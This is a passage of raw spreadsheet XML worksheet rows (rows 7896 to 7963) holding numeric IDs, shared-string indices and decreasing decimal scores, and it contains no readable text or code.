        <v>7374</v>
      </c>
      <c r="F7896" s="2">
        <v>0.1557239057239058</v>
      </c>
    </row>
    <row r="7897" ht="15.75" customHeight="1">
      <c r="A7897" s="1">
        <v>811.0</v>
      </c>
      <c r="B7897" s="2">
        <v>2.1357074E7</v>
      </c>
      <c r="C7897" s="2" t="s">
        <v>7500</v>
      </c>
      <c r="D7897" s="2">
        <v>1.0</v>
      </c>
      <c r="E7897" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7897" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="7898" ht="15.75" customHeight="1">
      <c r="A7898" s="1">
        <v>2911.0</v>
      </c>
      <c r="B7898" s="2">
        <v>3.5822094E7</v>
      </c>
      <c r="C7898" s="2" t="s">
        <v>7501</v>
      </c>
      <c r="D7898" s="2">
        <v>1.0</v>
      </c>
      <c r="E7898" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7898" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="7899" ht="15.75" customHeight="1">
      <c r="A7899" s="1">
        <v>3925.0</v>
      </c>
      <c r="B7899" s="2">
        <v>4.0562334E7</v>
      </c>
      <c r="C7899" s="2" t="s">
        <v>7502</v>
      </c>
      <c r="D7899" s="2">
        <v>1.0</v>
      </c>
      <c r="E7899" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7899" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="7900" ht="15.75" customHeight="1">
      <c r="A7900" s="1">
        <v>11695.0</v>
      </c>
      <c r="B7900" s="2">
        <v>2.3458481E7</v>
      </c>
      <c r="C7900" s="2" t="s">
        <v>7503</v>
      </c>
      <c r="D7900" s="2">
        <v>1.0</v>
      </c>
      <c r="E7900" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7900" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="7901" ht="15.75" customHeight="1">
      <c r="A7901" s="1">
        <v>14268.0</v>
      </c>
      <c r="B7901" s="2">
        <v>3.840275E7</v>
      </c>
      <c r="C7901" s="2" t="s">
        <v>7504</v>
      </c>
      <c r="D7901" s="2">
        <v>1.0</v>
      </c>
      <c r="E7901" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7901" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="7902" ht="15.75" customHeight="1">
      <c r="A7902" s="1">
        <v>2052.0</v>
      </c>
      <c r="B7902" s="2">
        <v>3.0954193E7</v>
      </c>
      <c r="C7902" s="2" t="s">
        <v>7505</v>
      </c>
      <c r="D7902" s="2">
        <v>1.0</v>
      </c>
      <c r="E7902" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7902" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="7903" ht="15.75" customHeight="1">
      <c r="A7903" s="1">
        <v>13915.0</v>
      </c>
      <c r="B7903" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C7903" s="2" t="s">
        <v>7506</v>
      </c>
      <c r="D7903" s="2">
        <v>1.0</v>
      </c>
      <c r="E7903" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7903" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="7904" ht="15.75" customHeight="1">
      <c r="A7904" s="1">
        <v>5716.0</v>
      </c>
      <c r="B7904" s="2">
        <v>4.6586084E7</v>
      </c>
      <c r="C7904" s="2" t="s">
        <v>7507</v>
      </c>
      <c r="D7904" s="2">
        <v>1.0</v>
      </c>
      <c r="E7904" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7904" s="2">
        <v>0.1549707602339182</v>
      </c>
    </row>
    <row r="7905" ht="15.75" customHeight="1">
      <c r="A7905" s="1">
        <v>17825.0</v>
      </c>
      <c r="B7905" s="2">
        <v>5.0915743E7</v>
      </c>
      <c r="C7905" s="2" t="s">
        <v>7508</v>
      </c>
      <c r="D7905" s="2">
        <v>1.0</v>
      </c>
      <c r="E7905" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7905" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="7906" ht="15.75" customHeight="1">
      <c r="A7906" s="1">
        <v>30538.0</v>
      </c>
      <c r="B7906" s="2">
        <v>4.056545E7</v>
      </c>
      <c r="C7906" s="2" t="s">
        <v>7509</v>
      </c>
      <c r="D7906" s="2">
        <v>1.0</v>
      </c>
      <c r="E7906" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7906" s="2">
        <v>0.1546296296296297</v>
      </c>
    </row>
    <row r="7907" ht="15.75" customHeight="1">
      <c r="A7907" s="1">
        <v>8227.0</v>
      </c>
      <c r="B7907" s="2">
        <v>5.3350333E7</v>
      </c>
      <c r="C7907" s="2" t="s">
        <v>7510</v>
      </c>
      <c r="D7907" s="2">
        <v>1.0</v>
      </c>
      <c r="E7907" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7907" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="7908" ht="15.75" customHeight="1">
      <c r="A7908" s="1">
        <v>5061.0</v>
      </c>
      <c r="B7908" s="2">
        <v>4.4361329E7</v>
      </c>
      <c r="C7908" s="2" t="s">
        <v>7511</v>
      </c>
      <c r="D7908" s="2">
        <v>1.0</v>
      </c>
      <c r="E7908" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7908" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="7909" ht="15.75" customHeight="1">
      <c r="A7909" s="1">
        <v>25553.0</v>
      </c>
      <c r="B7909" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C7909" s="2" t="s">
        <v>7512</v>
      </c>
      <c r="D7909" s="2">
        <v>1.0</v>
      </c>
      <c r="E7909" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7909" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="7910" ht="15.75" customHeight="1">
      <c r="A7910" s="1">
        <v>18821.0</v>
      </c>
      <c r="B7910" s="2">
        <v>5.3927142E7</v>
      </c>
      <c r="C7910" s="2" t="s">
        <v>7513</v>
      </c>
      <c r="D7910" s="2">
        <v>1.0</v>
      </c>
      <c r="E7910" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7910" s="2">
        <v>0.1537698412698414</v>
      </c>
    </row>
    <row r="7911" ht="15.75" customHeight="1">
      <c r="A7911" s="1">
        <v>1962.0</v>
      </c>
      <c r="B7911" s="2">
        <v>3.0324668E7</v>
      </c>
      <c r="C7911" s="2" t="s">
        <v>7514</v>
      </c>
      <c r="D7911" s="2">
        <v>1.0</v>
      </c>
      <c r="E7911" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7911" s="2">
        <v>0.1536458333333334</v>
      </c>
    </row>
    <row r="7912" ht="15.75" customHeight="1">
      <c r="A7912" s="1">
        <v>2331.0</v>
      </c>
      <c r="B7912" s="2">
        <v>3.2947639E7</v>
      </c>
      <c r="C7912" s="2" t="s">
        <v>7515</v>
      </c>
      <c r="D7912" s="2">
        <v>1.0</v>
      </c>
      <c r="E7912" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7912" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="7913" ht="15.75" customHeight="1">
      <c r="A7913" s="1">
        <v>6811.0</v>
      </c>
      <c r="B7913" s="2">
        <v>4.952962E7</v>
      </c>
      <c r="C7913" s="2" t="s">
        <v>7516</v>
      </c>
      <c r="D7913" s="2">
        <v>1.0</v>
      </c>
      <c r="E7913" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7913" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="7914" ht="15.75" customHeight="1">
      <c r="A7914" s="1">
        <v>1263.0</v>
      </c>
      <c r="B7914" s="2">
        <v>2.5249006E7</v>
      </c>
      <c r="C7914" s="2" t="s">
        <v>7517</v>
      </c>
      <c r="D7914" s="2">
        <v>1.0</v>
      </c>
      <c r="E7914" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7914" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="7915" ht="15.75" customHeight="1">
      <c r="A7915" s="1">
        <v>2440.0</v>
      </c>
      <c r="B7915" s="2">
        <v>3.3685135E7</v>
      </c>
      <c r="C7915" s="2" t="s">
        <v>7518</v>
      </c>
      <c r="D7915" s="2">
        <v>1.0</v>
      </c>
      <c r="E7915" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7915" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="7916" ht="15.75" customHeight="1">
      <c r="A7916" s="1">
        <v>2497.0</v>
      </c>
      <c r="B7916" s="2">
        <v>3.39074E7</v>
      </c>
      <c r="C7916" s="2" t="s">
        <v>7519</v>
      </c>
      <c r="D7916" s="2">
        <v>1.0</v>
      </c>
      <c r="E7916" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7916" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="7917" ht="15.75" customHeight="1">
      <c r="A7917" s="1">
        <v>7788.0</v>
      </c>
      <c r="B7917" s="2">
        <v>5.2198767E7</v>
      </c>
      <c r="C7917" s="2" t="s">
        <v>7520</v>
      </c>
      <c r="D7917" s="2">
        <v>1.0</v>
      </c>
      <c r="E7917" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7917" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="7918" ht="15.75" customHeight="1">
      <c r="A7918" s="1">
        <v>12105.0</v>
      </c>
      <c r="B7918" s="2">
        <v>2.6792108E7</v>
      </c>
      <c r="C7918" s="2" t="s">
        <v>7521</v>
      </c>
      <c r="D7918" s="2">
        <v>1.0</v>
      </c>
      <c r="E7918" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7918" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="7919" ht="15.75" customHeight="1">
      <c r="A7919" s="1">
        <v>19331.0</v>
      </c>
      <c r="B7919" s="2">
        <v>5.5325257E7</v>
      </c>
      <c r="C7919" s="2" t="s">
        <v>7522</v>
      </c>
      <c r="D7919" s="2">
        <v>1.0</v>
      </c>
      <c r="E7919" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7919" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="7920" ht="15.75" customHeight="1">
      <c r="A7920" s="1">
        <v>27759.0</v>
      </c>
      <c r="B7920" s="2">
        <v>2.3106166E7</v>
      </c>
      <c r="C7920" s="2" t="s">
        <v>7523</v>
      </c>
      <c r="D7920" s="2">
        <v>1.0</v>
      </c>
      <c r="E7920" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7920" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="7921" ht="15.75" customHeight="1">
      <c r="A7921" s="1">
        <v>27839.0</v>
      </c>
      <c r="B7921" s="2">
        <v>2.3421611E7</v>
      </c>
      <c r="C7921" s="2" t="s">
        <v>7524</v>
      </c>
      <c r="D7921" s="2">
        <v>1.0</v>
      </c>
      <c r="E7921" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7921" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="7922" ht="15.75" customHeight="1">
      <c r="A7922" s="1">
        <v>7774.0</v>
      </c>
      <c r="B7922" s="2">
        <v>5.2162175E7</v>
      </c>
      <c r="C7922" s="2" t="s">
        <v>7525</v>
      </c>
      <c r="D7922" s="2">
        <v>1.0</v>
      </c>
      <c r="E7922" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7922" s="2">
        <v>0.152557319223986</v>
      </c>
    </row>
    <row r="7923" ht="15.75" customHeight="1">
      <c r="A7923" s="1">
        <v>6688.0</v>
      </c>
      <c r="B7923" s="2">
        <v>4.9179821E7</v>
      </c>
      <c r="C7923" s="2" t="s">
        <v>7526</v>
      </c>
      <c r="D7923" s="2">
        <v>1.0</v>
      </c>
      <c r="E7923" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7923" s="2">
        <v>0.1517857142857144</v>
      </c>
    </row>
    <row r="7924" ht="15.75" customHeight="1">
      <c r="A7924" s="1">
        <v>20967.0</v>
      </c>
      <c r="B7924" s="2">
        <v>1.6776036E7</v>
      </c>
      <c r="C7924" s="2" t="s">
        <v>7527</v>
      </c>
      <c r="D7924" s="2">
        <v>1.0</v>
      </c>
      <c r="E7924" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7924" s="2">
        <v>0.1517412935323383</v>
      </c>
    </row>
    <row r="7925" ht="15.75" customHeight="1">
      <c r="A7925" s="1">
        <v>27051.0</v>
      </c>
      <c r="B7925" s="2">
        <v>2.031696E7</v>
      </c>
      <c r="C7925" s="2" t="s">
        <v>7528</v>
      </c>
      <c r="D7925" s="2">
        <v>1.0</v>
      </c>
      <c r="E7925" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7925" s="2">
        <v>0.1515873015873016</v>
      </c>
    </row>
    <row r="7926" ht="15.75" customHeight="1">
      <c r="A7926" s="1">
        <v>1390.0</v>
      </c>
      <c r="B7926" s="2">
        <v>2.6268039E7</v>
      </c>
      <c r="C7926" s="2" t="s">
        <v>7529</v>
      </c>
      <c r="D7926" s="2">
        <v>1.0</v>
      </c>
      <c r="E7926" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7926" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="7927" ht="15.75" customHeight="1">
      <c r="A7927" s="1">
        <v>4019.0</v>
      </c>
      <c r="B7927" s="2">
        <v>4.094925E7</v>
      </c>
      <c r="C7927" s="2" t="s">
        <v>7530</v>
      </c>
      <c r="D7927" s="2">
        <v>1.0</v>
      </c>
      <c r="E7927" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7927" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="7928" ht="15.75" customHeight="1">
      <c r="A7928" s="1">
        <v>5359.0</v>
      </c>
      <c r="B7928" s="2">
        <v>4.5370622E7</v>
      </c>
      <c r="C7928" s="2" t="s">
        <v>7531</v>
      </c>
      <c r="D7928" s="2">
        <v>1.0</v>
      </c>
      <c r="E7928" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7928" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="7929" ht="15.75" customHeight="1">
      <c r="A7929" s="1">
        <v>24202.0</v>
      </c>
      <c r="B7929" s="2">
        <v>1.0358206E7</v>
      </c>
      <c r="C7929" s="2" t="s">
        <v>7532</v>
      </c>
      <c r="D7929" s="2">
        <v>1.0</v>
      </c>
      <c r="E7929" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7929" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="7930" ht="15.75" customHeight="1">
      <c r="A7930" s="1">
        <v>30825.0</v>
      </c>
      <c r="B7930" s="2">
        <v>4541322.0</v>
      </c>
      <c r="C7930" s="2" t="s">
        <v>7533</v>
      </c>
      <c r="D7930" s="2">
        <v>1.0</v>
      </c>
      <c r="E7930" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7930" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="7931" ht="15.75" customHeight="1">
      <c r="A7931" s="1">
        <v>31660.0</v>
      </c>
      <c r="B7931" s="2">
        <v>5.1728205E7</v>
      </c>
      <c r="C7931" s="2" t="s">
        <v>7532</v>
      </c>
      <c r="D7931" s="2">
        <v>1.0</v>
      </c>
      <c r="E7931" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7931" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="7932" ht="15.75" customHeight="1">
      <c r="A7932" s="1">
        <v>20638.0</v>
      </c>
      <c r="B7932" s="2">
        <v>1.4176574E7</v>
      </c>
      <c r="C7932" s="2" t="s">
        <v>7534</v>
      </c>
      <c r="D7932" s="2">
        <v>1.0</v>
      </c>
      <c r="E7932" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7932" s="2">
        <v>0.1510721247563353</v>
      </c>
    </row>
    <row r="7933" ht="15.75" customHeight="1">
      <c r="A7933" s="1">
        <v>4640.0</v>
      </c>
      <c r="B7933" s="2">
        <v>4.3026893E7</v>
      </c>
      <c r="C7933" s="2" t="s">
        <v>7535</v>
      </c>
      <c r="D7933" s="2">
        <v>1.0</v>
      </c>
      <c r="E7933" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7933" s="2">
        <v>0.1509259259259259</v>
      </c>
    </row>
    <row r="7934" ht="15.75" customHeight="1">
      <c r="A7934" s="1">
        <v>7404.0</v>
      </c>
      <c r="B7934" s="2">
        <v>5.1105379E7</v>
      </c>
      <c r="C7934" s="2" t="s">
        <v>7536</v>
      </c>
      <c r="D7934" s="2">
        <v>1.0</v>
      </c>
      <c r="E7934" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7934" s="2">
        <v>0.1505050505050505</v>
      </c>
    </row>
    <row r="7935" ht="15.75" customHeight="1">
      <c r="A7935" s="1">
        <v>86.0</v>
      </c>
      <c r="B7935" s="2">
        <v>1.2023328E7</v>
      </c>
      <c r="C7935" s="2" t="s">
        <v>7537</v>
      </c>
      <c r="D7935" s="2">
        <v>1.0</v>
      </c>
      <c r="E7935" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7935" s="2">
        <v>0.1503831417624521</v>
      </c>
    </row>
    <row r="7936" ht="15.75" customHeight="1">
      <c r="A7936" s="1">
        <v>6444.0</v>
      </c>
      <c r="B7936" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C7936" s="2" t="s">
        <v>7538</v>
      </c>
      <c r="D7936" s="2">
        <v>1.0</v>
      </c>
      <c r="E7936" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7936" s="2">
        <v>0.1503831417624521</v>
      </c>
    </row>
    <row r="7937" ht="15.75" customHeight="1">
      <c r="A7937" s="1">
        <v>737.0</v>
      </c>
      <c r="B7937" s="2">
        <v>2.0818074E7</v>
      </c>
      <c r="C7937" s="2" t="s">
        <v>7539</v>
      </c>
      <c r="D7937" s="2">
        <v>1.0</v>
      </c>
      <c r="E7937" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7937" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="7938" ht="15.75" customHeight="1">
      <c r="A7938" s="1">
        <v>2978.0</v>
      </c>
      <c r="B7938" s="2">
        <v>3.6119183E7</v>
      </c>
      <c r="C7938" s="2" t="s">
        <v>7540</v>
      </c>
      <c r="D7938" s="2">
        <v>1.0</v>
      </c>
      <c r="E7938" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7938" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="7939" ht="15.75" customHeight="1">
      <c r="A7939" s="1">
        <v>3645.0</v>
      </c>
      <c r="B7939" s="2">
        <v>3.9283139E7</v>
      </c>
      <c r="C7939" s="2" t="s">
        <v>7541</v>
      </c>
      <c r="D7939" s="2">
        <v>1.0</v>
      </c>
      <c r="E7939" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7939" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="7940" ht="15.75" customHeight="1">
      <c r="A7940" s="1">
        <v>15678.0</v>
      </c>
      <c r="B7940" s="2">
        <v>4.3824839E7</v>
      </c>
      <c r="C7940" s="5" t="s">
        <v>7542</v>
      </c>
      <c r="D7940" s="2">
        <v>1.0</v>
      </c>
      <c r="E7940" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7940" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="7941" ht="15.75" customHeight="1">
      <c r="A7941" s="1">
        <v>16358.0</v>
      </c>
      <c r="B7941" s="2">
        <v>4.6107379E7</v>
      </c>
      <c r="C7941" s="2" t="s">
        <v>7543</v>
      </c>
      <c r="D7941" s="2">
        <v>1.0</v>
      </c>
      <c r="E7941" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7941" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="7942" ht="15.75" customHeight="1">
      <c r="A7942" s="1">
        <v>1904.0</v>
      </c>
      <c r="B7942" s="2">
        <v>2.999443E7</v>
      </c>
      <c r="C7942" s="2" t="s">
        <v>7544</v>
      </c>
      <c r="D7942" s="2">
        <v>1.0</v>
      </c>
      <c r="E7942" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7942" s="2">
        <v>0.1501736111111112</v>
      </c>
    </row>
    <row r="7943" ht="15.75" customHeight="1">
      <c r="A7943" s="1">
        <v>28664.0</v>
      </c>
      <c r="B7943" s="2">
        <v>2.743062E7</v>
      </c>
      <c r="C7943" s="2" t="s">
        <v>7545</v>
      </c>
      <c r="D7943" s="2">
        <v>1.0</v>
      </c>
      <c r="E7943" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7943" s="2">
        <v>0.149923896499239</v>
      </c>
    </row>
    <row r="7944" ht="15.75" customHeight="1">
      <c r="A7944" s="1">
        <v>1017.0</v>
      </c>
      <c r="B7944" s="2">
        <v>2.3165414E7</v>
      </c>
      <c r="C7944" s="2" t="s">
        <v>7546</v>
      </c>
      <c r="D7944" s="2">
        <v>1.0</v>
      </c>
      <c r="E7944" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7944" s="2">
        <v>0.1498015873015874</v>
      </c>
    </row>
    <row r="7945" ht="15.75" customHeight="1">
      <c r="A7945" s="1">
        <v>29321.0</v>
      </c>
      <c r="B7945" s="2">
        <v>3.1313843E7</v>
      </c>
      <c r="C7945" s="2" t="s">
        <v>7547</v>
      </c>
      <c r="D7945" s="2">
        <v>1.0</v>
      </c>
      <c r="E7945" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7945" s="2">
        <v>0.1498015873015874</v>
      </c>
    </row>
    <row r="7946" ht="15.75" customHeight="1">
      <c r="A7946" s="1">
        <v>11385.0</v>
      </c>
      <c r="B7946" s="2">
        <v>2.1491343E7</v>
      </c>
      <c r="C7946" s="2" t="s">
        <v>7548</v>
      </c>
      <c r="D7946" s="2">
        <v>1.0</v>
      </c>
      <c r="E7946" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7946" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="7947" ht="15.75" customHeight="1">
      <c r="A7947" s="1">
        <v>18664.0</v>
      </c>
      <c r="B7947" s="2">
        <v>5.3520228E7</v>
      </c>
      <c r="C7947" s="2" t="s">
        <v>7549</v>
      </c>
      <c r="D7947" s="2">
        <v>1.0</v>
      </c>
      <c r="E7947" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7947" s="2">
        <v>0.1495098039215687</v>
      </c>
    </row>
    <row r="7948" ht="15.75" customHeight="1">
      <c r="A7948" s="1">
        <v>6510.0</v>
      </c>
      <c r="B7948" s="2">
        <v>4.8759021E7</v>
      </c>
      <c r="C7948" s="2" t="s">
        <v>7550</v>
      </c>
      <c r="D7948" s="2">
        <v>1.0</v>
      </c>
      <c r="E7948" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7948" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="7949" ht="15.75" customHeight="1">
      <c r="A7949" s="1">
        <v>911.0</v>
      </c>
      <c r="B7949" s="2">
        <v>2.2177692E7</v>
      </c>
      <c r="C7949" s="2" t="s">
        <v>7551</v>
      </c>
      <c r="D7949" s="2">
        <v>1.0</v>
      </c>
      <c r="E7949" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7949" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7950" ht="15.75" customHeight="1">
      <c r="A7950" s="1">
        <v>1277.0</v>
      </c>
      <c r="B7950" s="2">
        <v>2.5467425E7</v>
      </c>
      <c r="C7950" s="2" t="s">
        <v>7552</v>
      </c>
      <c r="D7950" s="2">
        <v>1.0</v>
      </c>
      <c r="E7950" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7950" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7951" ht="15.75" customHeight="1">
      <c r="A7951" s="1">
        <v>3138.0</v>
      </c>
      <c r="B7951" s="2">
        <v>3.6899719E7</v>
      </c>
      <c r="C7951" s="2" t="s">
        <v>7553</v>
      </c>
      <c r="D7951" s="2">
        <v>1.0</v>
      </c>
      <c r="E7951" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7951" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7952" ht="15.75" customHeight="1">
      <c r="A7952" s="1">
        <v>3849.0</v>
      </c>
      <c r="B7952" s="2">
        <v>4.0250958E7</v>
      </c>
      <c r="C7952" s="2" t="s">
        <v>7554</v>
      </c>
      <c r="D7952" s="2">
        <v>1.0</v>
      </c>
      <c r="E7952" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7952" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7953" ht="15.75" customHeight="1">
      <c r="A7953" s="1">
        <v>5083.0</v>
      </c>
      <c r="B7953" s="2">
        <v>4.4474947E7</v>
      </c>
      <c r="C7953" s="2" t="s">
        <v>7555</v>
      </c>
      <c r="D7953" s="2">
        <v>1.0</v>
      </c>
      <c r="E7953" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7953" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7954" ht="15.75" customHeight="1">
      <c r="A7954" s="1">
        <v>8089.0</v>
      </c>
      <c r="B7954" s="2">
        <v>5.3041928E7</v>
      </c>
      <c r="C7954" s="2" t="s">
        <v>7556</v>
      </c>
      <c r="D7954" s="2">
        <v>1.0</v>
      </c>
      <c r="E7954" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7954" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7955" ht="15.75" customHeight="1">
      <c r="A7955" s="1">
        <v>9177.0</v>
      </c>
      <c r="B7955" s="2">
        <v>5.5364728E7</v>
      </c>
      <c r="C7955" s="2" t="s">
        <v>7557</v>
      </c>
      <c r="D7955" s="2">
        <v>1.0</v>
      </c>
      <c r="E7955" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7955" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7956" ht="15.75" customHeight="1">
      <c r="A7956" s="1">
        <v>11089.0</v>
      </c>
      <c r="B7956" s="2">
        <v>1.8511852E7</v>
      </c>
      <c r="C7956" s="2" t="s">
        <v>7558</v>
      </c>
      <c r="D7956" s="2">
        <v>1.0</v>
      </c>
      <c r="E7956" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7956" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7957" ht="15.75" customHeight="1">
      <c r="A7957" s="1">
        <v>11441.0</v>
      </c>
      <c r="B7957" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C7957" s="2" t="s">
        <v>7559</v>
      </c>
      <c r="D7957" s="2">
        <v>1.0</v>
      </c>
      <c r="E7957" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7957" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7958" ht="15.75" customHeight="1">
      <c r="A7958" s="1">
        <v>12622.0</v>
      </c>
      <c r="B7958" s="2">
        <v>3.0223746E7</v>
      </c>
      <c r="C7958" s="2" t="s">
        <v>7560</v>
      </c>
      <c r="D7958" s="2">
        <v>1.0</v>
      </c>
      <c r="E7958" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7958" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7959" ht="15.75" customHeight="1">
      <c r="A7959" s="1">
        <v>16391.0</v>
      </c>
      <c r="B7959" s="2">
        <v>4.6238495E7</v>
      </c>
      <c r="C7959" s="2" t="s">
        <v>7561</v>
      </c>
      <c r="D7959" s="2">
        <v>1.0</v>
      </c>
      <c r="E7959" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7959" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="7960" ht="15.75" customHeight="1">
      <c r="A7960" s="1">
        <v>3924.0</v>
      </c>
      <c r="B7960" s="2">
        <v>4.0562334E7</v>
      </c>
      <c r="C7960" s="2" t="s">
        <v>7562</v>
      </c>
      <c r="D7960" s="2">
        <v>1.0</v>
      </c>
      <c r="E7960" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7960" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="7961" ht="15.75" customHeight="1">
      <c r="A7961" s="1">
        <v>5601.0</v>
      </c>
      <c r="B7961" s="2">
        <v>4.6136334E7</v>
      </c>
      <c r="C7961" s="2" t="s">
        <v>7563</v>
      </c>
      <c r="D7961" s="2">
        <v>1.0</v>
      </c>
      <c r="E7961" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7961" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="7962" ht="15.75" customHeight="1">
      <c r="A7962" s="1">
        <v>5876.0</v>
      </c>
      <c r="B7962" s="2">
        <v>4.7061578E7</v>
      </c>
      <c r="C7962" s="2" t="s">
        <v>7564</v>
      </c>
      <c r="D7962" s="2">
        <v>1.0</v>
      </c>
      <c r="E7962" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7962" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="7963" ht="15.75" customHeight="1">
      <c r="A7963" s="1">
        <v>8770.0</v>
      </c>
      <c r="B7963" s="2">
        <v>5.4583818E7</v>
      </c>
      <c r="C7963" s="2" t="s">
        <v>7565</v>
      </c>
      <c r="D7963" s="2">
        <v>1.0</v>
      </c>
      <c r="E7963" s="3" t="s">
